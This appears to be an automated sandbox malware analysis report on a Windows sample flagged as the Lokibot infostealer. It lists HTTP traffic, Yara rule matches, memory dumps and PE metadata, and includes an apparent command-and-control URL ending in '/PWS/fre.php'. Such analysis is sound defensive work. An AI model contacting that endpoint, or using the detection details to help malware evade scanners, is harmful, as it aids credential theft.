Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kD5ayhKGPLcWtu32TkF%2FW2gNGZlu4xE13IUEGQiHUbTfNH%2FkMn%2FCT5qhkALNyktKvWgH9SpMro1AK6rOPLQMah78N2%2BLzSBvH3Fqnm086GVNr%2BbLMuhIUbdz7a8srw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e9d9d415e82-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kD5ayhKGPLcWtu32TkF%2FW2gNGZlu4xE13IUEGQiHUbTfNH%2FkMn%2FCT5qhkALNyktKvWgH9SpMro1AK6rOPLQMah78N2%2BLzSBvH3Fqnm086GVNr%2BbLMuhIUbdz7a8srw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e9d9d415e82-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kD5ayhKGPLcWtu32TkF%2FW2gNGZlu4xE13IUEGQiHUbTfNH%2FkMn%2FCT5qhkALNyktKvWgH9SpMro1AK6rOPLQMah78N2%2BLzSBvH3Fqnm086GVNr%2BbLMuhIUbdz7a8srw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e9d9d415e82-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Wc9BoQ2cdOOUz9pULeesDopHaLV2YsoAss%2BRpNsV9XeGVgAZszBw9X4envSXhECfsr9Clm5p4LzfDXdaB6UHvAiFvfB6ahf1EB92EHDQ%2FkzLDjxAuYRN6j7p67%2F6A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5ea84db18c15-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hpkspz6Y7C9CA5kg8Ib7X1Dl4El6GK1wiB6QUyMxjiOkWktD%2FdbmTLnYGMa0EA9fRx5Go8WqBZA5sE0xWBk97H9PqekxhWo8bfE%2F8SmEWFN8oe3EC7%2B2K6e4riM%2FHA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5eb48d1119db-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4wLxYX05jqFpNoYU2cVY48f%2FkC1uY7%2B4l03%2FLR6M0HLtrJYCqSvwE6VR%2FDQZSapg5W01P6lhDJcScE996oUNCiWHKwfdHcsv9WzisfE%2BRtN%2FS4JBVP%2BXxT%2BW6EgRwg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5eba7cbf438c-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0SdfyeaGArd9vXPBT1vRE92Sn%2F6Abpe9kDzekg14vuiOsKKX2pRbyg5kch1SYBfEWwFMXzHOI2VUOXNRVpuFLSIyYpctWsDFCffpweFs5ORAiQGZwhx36AR0%2BHLXpg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5ec019be4245-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OrIaHGUajYRIJBQ2y70HstN%2FXK%2FIN%2B%2BQGicIrj0G4bEVdjzgi1KHWwJ%2Fk%2Fa8B5BmsOJ956q8lqClQd9U17Y3aQYhB5fpjK7CukqeTBsooVtO73aGrLWdg0pfu9s%2Bcw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5ec56fad7c84-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q%2BzWaR9gQE3MUuopuuXliGTqRJyCSnKgjIvsS80CdUvWqGRVmKjEisT8jh4Ea75KWLDpxxcPgkzdU8P7zGk1%2BkIc3V6zA94X75L0DqL%2B0RYmqTHsK7TKXrFFQcyEGw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5ecb5df14386-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: aspnet_compiler.exe, 00000002.00000002.3002581608.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.3003005750.0000000000E18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dddotx.shop/Mine/PWS/fre.php

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.1e#U0414.exe.446ab08.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.1e#U0414.exe.446ab08.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.1e#U0414.exe.446ab08.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.1e#U0414.exe.446ab08.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: 1e#U0414.exe PID: 6760, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 6880, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: C:\Users\user\Desktop\1e#U0414.exe	Code function: 0_2_032227C0	0_2_032227C0
Source: C:\Users\user\Desktop\1e#U0414.exe	Code function: 0_2_03220A98	0_2_03220A98
Source: C:\Users\user\Desktop\1e#U0414.exe	Code function: 0_2_0322515A	0_2_0322515A
Source: C:\Users\user\Desktop\1e#U0414.exe	Code function: 0_2_0322536B	0_2_0322536B
Source: C:\Users\user\Desktop\1e#U0414.exe	Code function: 0_2_032253A9	0_2_032253A9
Source: C:\Users\user\Desktop\1e#U0414.exe	Code function: 0_2_03220A87	0_2_03220A87
Source: C:\Users\user\Desktop\1e#U0414.exe	Code function: 0_2_03221C32	0_2_03221C32
Source: C:\Users\user\Desktop\1e#U0414.exe	Code function: 0_2_03221C40	0_2_03221C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 2_2_0040549C	2_2_0040549C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 2_2_004029D4	2_2_004029D4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00405B6F appears 42 times

Source: 1e#U0414.exe, 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBATMAN.dll. vs 1e#U0414.exe
Source: 1e#U0414.exe, 00000000.00000000.1744817799.0000000000FFC000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSept24.exe. vs 1e#U0414.exe
Source: 1e#U0414.exe, 00000000.00000002.1750465955.0000000004484000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs 1e#U0414.exe
Source: 1e#U0414.exe, 00000000.00000002.1751491077.00000000058B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBATMAN.dll. vs 1e#U0414.exe
Source: 1e#U0414.exe, 00000000.00000002.1751439929.0000000005880000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs 1e#U0414.exe
Source: 1e#U0414.exe, 00000000.00000002.1749617136.000000000153E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 1e#U0414.exe
Source: 1e#U0414.exe	Binary or memory string: OriginalFilenameSept24.exe. vs 1e#U0414.exe

Source: 1e#U0414.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.1e#U0414.exe.446ab08.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.1e#U0414.exe.446ab08.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.1e#U0414.exe.446ab08.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.1e#U0414.exe.446ab08.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
